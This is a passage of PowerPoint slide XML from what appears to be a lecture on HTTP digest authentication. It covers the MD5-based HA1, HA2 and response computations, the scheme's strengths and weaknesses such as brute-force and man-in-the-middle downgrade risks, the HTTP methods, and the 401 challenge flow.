                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the qop (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quality of Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) directive is "auth" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or unspecified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, HA2 is:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103429" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AB8899-B0E3-4F2E-A26D-3C6C40FD02E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2714626"/>
            <a:ext cx="392430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0" name="Rettangolo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B11F809-D2F6-4E73-A956-C0E7EDD2F076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024064" y="3143250"/>
            <a:ext cx="7786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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the qop directive is "auth-int" ,  HA2 is:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103431" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC997FA-C46E-4221-9018-E54C2BD1FD4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95501" y="3643314"/>
            <a:ext cx="55721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2" name="Rettangolo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB77B5D-1D80-4EA8-91D4-17AE72F7D10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2095500" y="4071938"/>
            <a:ext cx="7786688"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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the qop directive is "auth" or "auth-int" , then compute the response as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103433" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304F2EEF-0D46-4F0C-86B6-06E456D6C23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4714876"/>
            <a:ext cx="5734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4" name="Rettangolo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{695EFED3-BAEC-4571-939B-7EAE3DC8417E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024064" y="5143500"/>
            <a:ext cx="8072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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the qop directive is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unspecified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, then compute the response as follows :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103435" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5D6AB2-ACB8-419E-BBF0-DDFA703E57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5786439"/>
            <a:ext cx="3067050"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E64B7B-726E-4516-A83D-F1940E317849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>MD5 &amp; Digest authentication</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34535920-C474-4356-BE0B-74086F682E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>The MD5 calculations used in HTTP digest authentication is intended to be "one way"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>It should be difficult to determine the original input when only the output is known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>If the password itself is too simple, however, then it may be possible to test all possible inputs and find a matching output (a brute-force attack) </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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231A9C-6AD9-4363-9AE6-1C3615931841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Advantages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2294FF28-3F5E-41A1-B0AB-A0E3A1ACC434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP digest authentication is designed to be more secure than traditional digest authentication schemes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The password is not used directly in the digest, but rather HA1 = MD5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>username:realm:password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows some implementations (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3" tooltip="JBoss"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to store HA1 rather than the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5" tooltip="Cleartext"/>
              </a:rPr>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client nonce was introduced in RFC 2617, which allows the client to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Chosen-plaintext attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server nonce is allowed to contain timestamps. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Therefore the server may inspect nonce attributes submitted by clients, to prevent replay attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server is also allowed to maintain a list of recently issued or used server nonce values to prevent reuse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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5CC912ED-4077-4E7D-808B-254AEC58F758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Disadvantages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C08BFB-39FC-45AE-9E8D-E4A08B996F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="8229600" cy="4829175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digest access authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It replaces unencrypted HTTP basic access authentication but It doesn’t replace strong authentication protocols, such as public-key or Kerberos authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many of the security features in  RFC 2617 are optional. If quality-of-protection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is not specified by the server, the client will operate in a security-reduced legacy mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digest access authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> For example, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacker could tell clients to use basic access authentication or legacy RFC2069 digest access authentication mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digest access authentication provides no mechanism for clients to verify the server's identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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A8F3281-F2ED-4260-B066-B1680CF863D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6697A984-21E6-4C1D-A54D-4F5AD3DC952D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="4033838" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Ask only for information about a resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424B95BF-E2F2-4E23-A16E-18F02199E65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6176964" y="1600201"/>
            <a:ext cx="4033837" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>GET, POST, HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>PUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>File upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>DELETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>File deletion</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231B05F8-44EB-42B6-A8D1-60F3C606C475}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B4ECBF-6FAD-403B-A9BF-F11F1E2A6505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client asks for a page that requires authentication but does not provide a username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server responds with the 401 "Unauthorized" response code, providing the authentication realm and a randomly-generated, single-use value called a nonce.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client will present the authentication to the user and prompt for a username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once a username and password have been supplied, the client re-sends the same request but adds an authentication header that includes the response code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server accepts the authentication and the page is returned. If the username is invalid and/or the password is incorrect, the server might return the "401" response code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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66526DE0-41B4-4CD4-9744-34D123B59D0B}"/>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113667" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054B1DCA-9F97-4660-B410-6689B02A6455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1881189" y="1643064"/>
